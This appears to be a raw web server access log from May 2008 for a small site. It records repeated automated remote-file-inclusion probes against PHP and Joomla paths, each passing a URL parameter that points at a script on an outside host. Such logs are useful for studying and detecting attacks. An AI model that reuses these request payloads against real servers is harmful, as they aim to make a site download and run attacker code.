209.62.26.18 - - [25/May/2008:20:25:50 -0700] "GET /logs/access_080211.log//index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:20:25:50 -0700] "GET //index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:20:25:51 -0700] "GET /logs//index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:25:58 -0700] "GET //index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:25:59 -0700] "GET /logs/access.log//index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:25:59 -0700] "GET //index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:25:59 -0700] "GET /logs//index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:26:00 -0700] "GET /logs/access_080211.log//index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:26:00 -0700] "GET //index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:26:00 -0700] "GET //index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:26:53 -0700] "GET /logs//index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:26:53 -0700] "GET //index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
64.34.164.75 - - [25/May/2008:20:26:54 -0700] "GET /logs//index.php?sourcedir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.34.164.75 - - [25/May/2008:20:26:55 -0700] "GET //index.php?sourcedir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
213.197.59.3 - - [25/May/2008:20:27:46 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.197.59.3 - - [25/May/2008:20:27:46 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
64.34.164.75 - - [25/May/2008:20:28:07 -0700] "GET /logs//index.php?sourcedir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
64.34.164.75 - - [25/May/2008:20:28:07 -0700] "GET //index.php?sourcedir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
85.236.48.244 - - [25/May/2008:20:28:09 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.236.48.244 - - [25/May/2008:20:28:09 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.236.48.244 - - [25/May/2008:20:28:10 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:28:21 -0700] "GET /logs/access_080211.log//index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:28:22 -0700] "GET //index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:28:22 -0700] "GET /logs//index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:28:41 -0700] "GET /logs/access.log//index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:28:41 -0700] "GET /logs//index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [25/May/2008:20:29:33 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [25/May/2008:20:29:33 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [25/May/2008:20:29:33 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:29:54 -0700] "GET /logs/access.log//index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
77.79.246.70 - - [25/May/2008:20:30:16 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [25/May/2008:20:30:17 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [25/May/2008:20:30:17 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:32:11 -0700] "GET /logs/access_080211.log//index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:32:11 -0700] "GET /logs//index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:33:40 -0700] "GET /logs/access_080211.log//index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:33:41 -0700] "GET /logs//index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
87.106.10.53 - - [25/May/2008:20:33:48 -0700] "GET /logs//index.php?sourcedir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.10.53 - - [25/May/2008:20:33:48 -0700] "GET //index.php?sourcedir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:20:36:11 -0700] "GET /logs/access_080211.log//index.php?sourcedir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:20:36:12 -0700] "GET /logs//index.php?sourcedir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
87.106.10.53 - - [25/May/2008:20:38:19 -0700] "GET /logs//index.php?sourcedir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.10.53 - - [25/May/2008:20:38:19 -0700] "GET //index.php?sourcedir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.19.120.178 - - [25/May/2008:20:38:24 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
67.19.120.178 - - [25/May/2008:20:38:24 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
67.19.120.178 - - [25/May/2008:20:38:24 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:38:34 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:38:35 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:38:35 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:38:44 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:38:44 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:38:45 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:38:45 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:38:45 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:38:45 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
158.227.2.24 - - [25/May/2008:20:38:56 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
158.227.2.24 - - [25/May/2008:20:38:57 -0700] "GET /logs//?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 6520 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
194.158.195.132 - - [25/May/2008:20:39:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
201.12.151.34 - - [25/May/2008:20:39:17 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
194.158.195.132 - - [25/May/2008:20:39:22 -0700] "GET //skin/zero_vote/error.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:39:57 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:39:57 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:39:57 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:42:23 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:42:24 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:42:24 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:42:54 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:42:54 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:42:54 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:43:31 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:43:31 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:43:32 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:43:32 -0700] "GET /logs/access_080225.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:43:32 -0700] "GET /logs/access_080225.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:43:32 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:43:32 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:43:33 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:43:33 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
67.19.120.178 - - [25/May/2008:20:43:33 -0700] "GET /logs/access_080225.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
67.19.120.178 - - [25/May/2008:20:43:34 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
67.19.120.178 - - [25/May/2008:20:43:34 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:43:36 -0700] "GET /logs/access_080225.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:43:36 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:43:37 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:43:41 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:43:42 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:43:42 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:43:42 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:43:42 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:43:42 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:44:48 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:44:49 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:44:49 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:45:00 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:45:00 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:45:00 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:45:06 -0700] "GET /logs/access_080225.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:45:06 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:45:06 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:45:13 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:45:13 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:45:13 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:45:29 -0700] "GET /logs/access_080310.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
